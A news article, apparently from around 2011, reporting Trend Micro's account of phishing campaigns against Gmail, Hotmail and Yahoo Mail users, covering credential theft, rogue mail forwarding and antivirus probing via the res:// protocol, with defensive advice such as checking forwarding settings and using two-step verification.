Google recently revealed the details of a successful phishing attack that compromised several high-profile users on its Gmail service. Yahoo Mail and Hotmail users are also under attack, said Trend Micro.
Days after Google disclosed
had been hit by a phishing campaign, reports have emerged of
similar attacks against other Web-based email providers.
Hotmail and Yahoo Mail have
also been targeted with similar phishing attacks, Nart Villeneuve, a senior
threat researcher at Trend Micro, wrote in a June 2 blog post. Villeneuve believed the attacks
were conducted separately.
Like the assault on Gmail,
the perpetrators were trying to gain control of user accounts on other Web mail
services in order to monitor communications. Some of the attacks also have
another objective: to find out what sort of security software was installed on
the user's system. The information would help attackers plan
future assaults, according to Villeneuve.
"There have been a variety
of recent attacks on popular Web mail platforms. In addition to Gmail, Hotmail
and Yahoo! Mail have also been targeted," Villeneuve wrote on the Trend
The initial phase appears to
be a targeted email that redirected users to a fake site designed to trick
users into entering their log-in credentials. With the information in hand, the
attacker can log in to the account to change certain settings that allow them
to monitor all outgoing mail. The Gmail attackers entered the email address
that they control under the "forwarding and delegation settings," which allows
them to send and receive email messages without having to ever log back into
the accounts. Hotmail keeps the forwarding features under "Email forwarding" in
Options. Only users who have upgraded to Yahoo Mail Plus have the option to
forward their messages to another address.
This is why when users know
their accounts have been hacked, it's not enough to just reset the password.
It's important to check that the attackers aren't forwarding all messages to rogue
The scam also involves
running a script that exploited the res:// protocol to discover the type of
antivirus software that is running on the system the victim is using. This
could be the victim's personal machine or even a public terminal in a
university or library. The res:// protocol has been part of the Internet
Explorer Web browser since version 4.0 and can be used to access resources
inside an executable (EXE) or library (DLL) file on the computer.
Malware that exploits the
res:// protocol are used to craft customized attacks that "have a high
probability of success," Villeneuve said. By relying on this two-pronged
method, attackers can gain full control over the victim's PC, not just the Web mail
In addition to spear
phishing, the attackers appeared to be looking at Web vulnerabilities to target
political activists, Villeneuve said. The Gmail account was similar to an
attack targeting Hotmail
users in Taiwan
. The malicious email, which masqueraded as a message from
the Facebook security team, could take over the user's account simply by
In another incident,
adversaries tried to steal user cookies in order to access Yahoo Mail accounts
without needing to crack users' log-in information or passwords. Trend Micro
alerted Yahoo to the attack. "While this attempt appeared to fail, it does
signify that attackers are attempting to attack Yahoo! Mail users as
well," said Villeneuve.
The Yahoo Mail attackers
were also behind a different spam campaign that featured malicious Microsoft
Excel spreadsheets back in March, according to Trend Micro.
"These attacks can be
difficult to defend against because these often appear to come from
recognizable sources," Villenueve said. There are some clues that can help
identify phishing emails, such as spelling and grammatical errors.
In addition, while the
malicious links may contain keywords like "google," "hotmail," or "yahoo,"
these will actually be links to third-party Websites that can be easily
spotted. The use of two-step verification processes can also help defend
against such attacks.